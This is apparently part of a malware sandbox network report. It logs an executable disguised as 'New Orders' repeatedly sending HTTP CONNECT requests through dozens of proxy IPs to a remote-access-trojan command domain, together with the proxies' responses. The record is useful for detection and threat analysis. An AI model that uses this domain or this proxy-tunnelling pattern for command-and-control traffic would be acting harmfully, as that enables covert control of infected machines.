                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1489192.168.2.9538785.161.231.34807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.247876883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.465208054 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1490192.168.2.95386791.134.140.16054017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.248056889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.809951067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.336060047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.445405960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.392252922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1491192.168.2.95425489.218.8.15210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.249892950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1492192.168.2.954263157.185.173.217265897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.261126041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1493192.168.2.954252103.190.54.141807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.261754036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1494192.168.2.954271125.122.26.24210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.262675047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1495192.168.2.954270103.166.141.74200747672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.335438013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1496192.168.2.95373351.68.164.77545047672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.336627960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.367245913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1497192.168.2.954331172.67.255.224807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.336908102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.491374969 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1498192.168.2.95261251.15.211.81163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.342720985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.367259979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.460931063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.461405993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.463614941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.570070028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:34.570101023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:58.571891069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:46.663815022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1499192.168.2.95394882.223.121.72560027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.344463110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.417320967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.445444107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.445252895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.444998980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1500192.168.2.95429994.23.252.16891807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.346609116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.039011955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148502111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132935047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1501192.168.2.954367104.19.124.112807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.346709013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.501720905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1502192.168.2.95430234.92.12.21092387672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.347026110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.657759905 CET28INHTTP/1.1 502 Bad Gateway


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1503192.168.2.954369104.25.234.81807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.347297907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.502171040 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1504192.168.2.953902182.16.175.16456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.352937937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1505192.168.2.954343162.223.91.11807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.362925053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.118839979 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:17:17 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1506192.168.2.952600190.2.110.741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.363101006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1507192.168.2.954350206.220.175.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.363522053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1508192.168.2.953952103.143.8.12280897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.375802040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.417454958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.521383047 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1509192.168.2.95438547.89.184.1831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.375802994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.591819048 CET38INHTTP/1.1 200 OK
                                                                                        content-length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1510192.168.2.954321203.218.172.22580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.387855053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.852437019 CET326INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1511192.168.2.95432846.17.63.16641547672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.388299942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687738895 CET339INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/4.7
